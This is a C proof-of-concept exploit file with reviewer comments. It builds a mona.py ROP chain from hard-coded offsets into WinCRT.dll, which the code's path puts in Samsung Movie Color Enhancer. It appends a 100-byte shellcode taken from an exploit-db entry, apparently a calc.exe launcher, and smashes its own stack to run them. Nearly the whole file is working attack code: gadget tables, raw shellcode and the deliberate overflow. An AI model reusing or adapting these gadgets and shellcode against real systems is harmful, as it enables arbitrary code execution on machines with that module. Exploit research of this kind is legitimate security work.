/*
 * Self-contained proof-of-concept: builds a ROP chain from fixed offsets into
 * WinCRT.dll, appends a 100-byte payload, then deliberately overflows a stack
 * buffer in exploit() so the chain runs when exploit() returns.
 *
 * Everything below depends on two things that a reviewer should treat as
 * build-specific rather than portable: (a) WinCRT.dll being loaded at exactly
 * 0x10000000 (the mona.py header in exploit() records ASLR: False,
 * Rebase: False), and (b) the exact stack layout the compiler emits for
 * exploit() and main().  That is why this file is documented in place rather
 * than restructured — any change to locals or optimisation level alters (b).
 *
 * NOTE(review): the three #include directives below carry no header name in
 * this copy (lost in extraction); as written the file does not compile.
 */
#include
#include
#include

/*
 * Convenience macro (unused in this file): sizes a VLA from a dry run of
 * create_rop_chain(NULL, ...) and then fills it.  Uses the GNU
 * `, ##__VA_ARGS__` extension to swallow the comma when no extra arguments
 * are passed.  create_rop_chain() is called twice; the NULL call only
 * measures, so this is harmless.
 */
#define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

/*
 * Copies the gadget table into `buf` (when non-NULL) and returns its size in
 * bytes, so a NULL call can be used as a size query first.
 *
 * base_wincrt: load address of WinCRT.dll; every gadget entry is base + offset.
 * Returns sizeof(rop_gadgets) narrowed to int — 28 entries, i.e. 112 bytes on
 * the 32-bit target this chain is written for (x86 register names throughout).
 *
 * NOTE(review): the offsets are mona.py output for one specific DLL build
 * (named in exploit()).  They are invalid for any other build, and they all
 * break at once if the module is rebased or built with ASLR — which is the
 * cheapest mitigation the vendor could apply.
 */
int create_rop_chain(unsigned int *buf, unsigned int base_wincrt)
{
    // rop chain generated with mona.py - www.corelan.be
    //
    // Shape, as far as the mona.py annotations show it: the first gadgets
    // load the VirtualAlloc IAT slot into EAX and dereference it, the middle
    // ones stage constants in registers (presumably VirtualAlloc's arguments
    // — confirm against the PUSHAD frame), and the final PUSHAD // RETN turns
    // the register file into the call.  0x41414141 entries are padding for
    // gadgets that RETN with an immediate and are never meant to execute.
    unsigned int rop_gadgets[] = {
        base_wincrt + 0x0000df9e, // POP EAX // POP ESI // RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8, // ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141, // Filler (compensate)
        base_wincrt + 0x00005bff, // MOV EAX,DWORD PTR DS:[EAX] // ADD CL,CL // RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d, // PUSH EAX // ADD AL,5F // POP ESI // RETN [WinCRT.dll]
        0x41414141, // Filler (RETN offset compensation)
        0x41414141, // Filler (RETN offset compensation)
        base_wincrt + 0x00018392, // POP EBP // RETN [WinCRT.dll]
        base_wincrt + 0x00009558, // push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]
        base_wincrt + 0x00005f0c, // POP EBX // RETN [WinCRT.dll]
        0x00001000, // 0x00001000-> ebx
        base_wincrt + 0x0001b39c, // XOR EDX,EDX // RETN [WinCRT.dll]
        base_wincrt + 0x000196e9, // POP ECX // RETN [WinCRT.dll]
        0x90909090, // 0x90909090 -> ecx
        base_wincrt + 0x00014ca1, // MOV EAX,ECX // RETN [WinCRT.dll]
        base_wincrt + 0x0001175e, // ADD EDX,EBX // POP EBX // RETN 0x10 [WinCRT.dll]
        0x41414141, // Filler (compensate)
        base_wincrt + 0x000196e9, // POP ECX // RETN [WinCRT.dll]
        0x41414141, // Filler (RETN offset compensation)
        0x41414141, // Filler (RETN offset compensation)
        0x41414141, // Filler (RETN offset compensation)
        0x41414141, // Filler (RETN offset compensation)
        0x00000040, // 0x00000040-> ecx
        base_wincrt + 0x0000bd12, // POP EBX // RETN [WinCRT.dll]
        0x00000001, // 0x00000001-> ebx
        base_wincrt + 0x0000f203, // POP EDI // RETN [WinCRT.dll]
        base_wincrt + 0x0000f204, // RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000c27e, // PUSHAD // ADD AL,0 // RETN [WinCRT.dll]
    };
    // Only copy when the caller supplied storage; a NULL buf is a size query.
    if(buf != NULL) {
        memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };  // NOTE(review): stray ';' after the block — an empty statement, harmless.
    return sizeof(rop_gadgets);  // size_t narrowed to int; 112 fits trivially.
}

/*
 * Shows a message box before the overflow.  Per the original comment its only
 * purpose is to pull in user32 so that WinCRT.dll is resident when the chain
 * runs; the text is irrelevant.
 */
void hello()
{
    // this user32 import will ensure that WinCRT.dll is loaded.. :)
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);
}

/*
 * Assembles chain + payload in a static buffer, then smashes its own stack
 * frame with it.
 *
 * rop_chain is static, so it is zero-initialised: the copy at the end reads
 * initialised memory even beyond the 212 bytes (112 gadget bytes + 100
 * payload bytes) actually written into it.
 *
 * NOTE(review): `memcpy(a+28, ...)` writes rop_chain_length + 113 = 225 bytes
 * starting 28 bytes past a 4-byte automatic array.  That is undefined
 * behaviour by design: it assumes the compiler places `a` at a fixed distance
 * below the saved return address.  Stack cookies (/GS), a different
 * optimisation level, or one extra local would all change that distance and
 * the PoC would stop working — treat "+28" and "+113" as build-specific magic
 * numbers, not as tunables.
 */
void exploit()
{
    // [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
    unsigned int base_wincrt = 0x10000000;  // hard-coded: module is neither ASLR'd nor rebased
    static unsigned int rop_chain[256];
    int rop_chain_length = create_rop_chain(rop_chain, base_wincrt);
    // http://www.exploit-db.com/exploits/28996/
    // 100-byte payload appended immediately after the gadgets (index is in
    // unsigned ints, hence the division by sizeof(int)).  The ASCII bytes
    // near the end ("calc", ".exe") suggest a calc.exe launcher — i.e. the
    // benign PoC payload from the exploit-db entry above.
    memcpy(rop_chain + rop_chain_length/sizeof(int),
           "\x31\xf6\x56\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e"
           "\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18"
           "\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31"
           "\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x66\x81\xfa\x10"
           "\xf5\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b"
           "\x7b\x1c\x01\xef\x03\x2c\x97\x68\x2e\x65\x78\x65\x68\x63\x61"
           "\x6c\x63\x54\x87\x04\x24\x50\xff\xd5\xcc", 100);
    // go get 'em!
    char a[4];
    // Deliberate stack buffer overflow: overwrites this frame's return address
    // with the start of the chain (see the function comment).
    memcpy(a+28, rop_chain, rop_chain_length + 113);
}

/*
 * Entry point.  super_size_me is never read; per the author's comment it is
 * there only to enlarge main()'s frame so the overflow in exploit() stays
 * within mapped stack.  No explicit return — C99 makes main() return 0.
 */
int main()
{
    // need some stack to overwrite with the buffer overflow :p
    char super_size_me[512];
    hello();
    exploit();
}